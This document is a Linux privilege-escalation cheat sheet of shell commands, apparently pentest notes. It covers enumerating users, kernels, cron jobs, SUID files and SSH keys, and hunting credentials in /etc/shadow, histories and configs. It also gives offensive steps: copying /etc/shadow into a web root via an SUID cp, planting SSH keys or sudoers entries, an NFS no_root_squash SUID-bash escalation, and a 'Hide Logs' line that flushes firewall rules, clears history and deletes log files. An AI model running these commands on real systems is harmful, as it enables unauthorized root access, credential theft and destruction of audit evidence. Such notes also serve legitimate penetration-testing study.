Linux privexc
Linux Enumeration for Privilege Escalation¶
Printer¶
lpstat -a
OS Enumeration¶
Operating System Enumeration:
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
uname -n // System hostname
hostname // As above
Kernel version:
cat /proc/version
uname -a
uname -r // Kernel release
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
cat /proc/cpuinfo // CPU information
User Information¶
Environmental Variables:
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
set // As above
echo $PATH
history
env
Users and Groups:
cat /etc/passwd
cat /etc/group // List all groups on the system
cat /etc/shadow // Show user hashes – Privileged command
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts
finger // Users currently logged in
pinky // As above
users // As above
who -a // As above
w // Who is currently logged in and what they’re doing
last // Listing of last logged on users
lastlog // Information on when all users last logged in
lastlog --user root // Information on when the specified user last logged in
User and Permission Information:
whoami
id
cat /etc/sudoers // Who’s allowed to do what as root – Privileged command
sudo -l // Can the current user perform anything as root
cat /etc/passwd | cut -d: # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
What has the user being doing?
Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Services/Applications¶
Which service(s) are been running by root?
Of these services, which are vulnerable - it's worth a double check!
ps aux | grep root
ps -ef | grep root
What applications are installed?
What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
dpkg -l
rpm -qa
sudo -V
httpd -v
apache2 -v
apache2ctl (or apachectl) -M
mysql --version
perl -v
java -version
python --version
ruby -v
find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc) Locate ‘useful’ programs (netcat, wget etc)
which %program_name% (i.e. nc, netcat, wget, nmap etc) As above
Check Service Settings
Are they misconfigured or have (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
ps aux | grep root // View services running as root
cat /etc/inetd.conf // List services managed by inetd
cat /etc/xinetd.conf // As above for xinetd
SSH information¶
Can private-key information be found?
ls -la ~/.ssh/
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
ls -la /etc/ssh/
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
Scheduled Tasks¶
crontab -l -u %username%
ls -la /etc/cron*
ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
ls -alh /etc/cron.daily
ls -alh /etc/cron.weekly
ls -alh /etc/cron.monthly
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Other Configuration files¶
find /home –name .rhosts -print 2>/dev/null
ls -ahlR /root/
ls -ahlR /home/
ls -la ~/.*_history
ls -la /usr/sbin/in.*
find /var/log -type f -exec ls -la {} ; 2>/dev/null
find /var/log -name *.log -type f -exec ls -la {} ; 2>/dev/null
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
find /etc/ -maxdepth 1 -name .conf -type f -exec ls -la {} ; 2>/dev/null
ls -la /etc/*.conf As above
lsof -i -n ## List open files (output will depend on account privileges)
lsof -u root ## lists all open files and processes by user root
Permissions¶
Which configuration files can be written in /etc/?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
World Writable and Executable directories:
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o+w -type d 2>/dev/null # world-writeable folders
find / -perm -o+x -type d 2>/dev/null # world-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders
Any "problem" files? Word-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
Sticky bits, SUID & GUID
find / -perm -u=s -type f 2>/dev/null #Find FILES that have the sticky bit set.
find / -perm -1000 -type d 2>/dev/null # Find DIRECTORIES w/ Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
We found cp (copy) in the above list and now we are abusing it:
cp -f --no-preserve=all /etc/shadow /var/www/html/joomla/shadow.txt
Few things to keep in mind:
1. At the destination, the file owner will be root but the group will be that of the current user and
2. Notice the use of "--no-preserve" this is needed to read out protected files.
3. A lot of ways we can abuse this, update the shadow file with a new account, modify sudoers, plant ssh key + modify sshd_config ## + reboot,or cron.hourly.
Credential Files¶
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
What can be found in /var/ ?
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on website or within the database
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
Getting more information from a file¶
file ./somefile ## file info
strings ./*.txt | grep password
find / -name “*.log” |xargs grep -i pass
grep -l -i pass /var/log/*.log 2>/dev/null
find / -maxdepth 10 -name *.conf -type f | grep -Hn pass; 2>/dev/null # searches for the string 'password' and output the line number
find / -maxdepth 10 -name *etc* -type f | grep -Hn pass; 2>/dev/null # as above, but in *etc*
grep -l -i pass /var/log/*.log 2>/dev/null # Check log files for keywords (‘pass’ in this example) and show positive matches
find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2>/dev/null #Find .conf files (recursive 4 levels) and output line number where the word password is located
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
hexeditor ./file
objdump -D -M intel ./file
objdump -D -M x86-64 ./file >> dump64.file
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
find / -name "network-secret.txt"
locate "network-secret.txt"
File Systems¶
df -ah # all FS info, including pseudo, duplicate, INACCESSIBLE file systems
Are there any unmounted file-systems?
cat /etc/fstab
Networking¶
/sbin/ifconfig -a // List all network interfaces
cat /etc/network/interfaces // As above
cat /etc/sysconfig/network
arp -a Display ARP communications
route Display route information
cat /etc/resolv.conf Show configured DNS sever addresses
netstat -antp List all TCP sockets and related PIDs (-p Privileged command)
netstat -anup List all UDP sockets and related PIDs (-p Privileged command)
iptables -L List rules – Privileged command
cat /etc/services View port numbers/services mappings
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
tcpdump -n dst host 192.168.1.5 -vvv -n -w file.cap
More Info
Is tunneling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
Copy bash to a new subshell
mount a NFS share from a remote server, copy bash from local to remote and execute
cp -p ./bash /mnt/share/newbash
./newbash -p
== Preparation & Finding Exploit Code ==
What development tools/languages are installed/supported?¶
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
Hide Logs¶
iptables -F; history -c; find ./ -name “*.log” |xargs rm -f
Local Privilege Escalation Pre-compiled binaries files. Use at your own risk¶
Linux Privilege Escalation using weak NFS permissions
if contains no_root_squash then
1. cp /bin/bash /shared
2. mount -t nfs server:/shared /mnt/
3. chown root:root bash && chmod u+s bash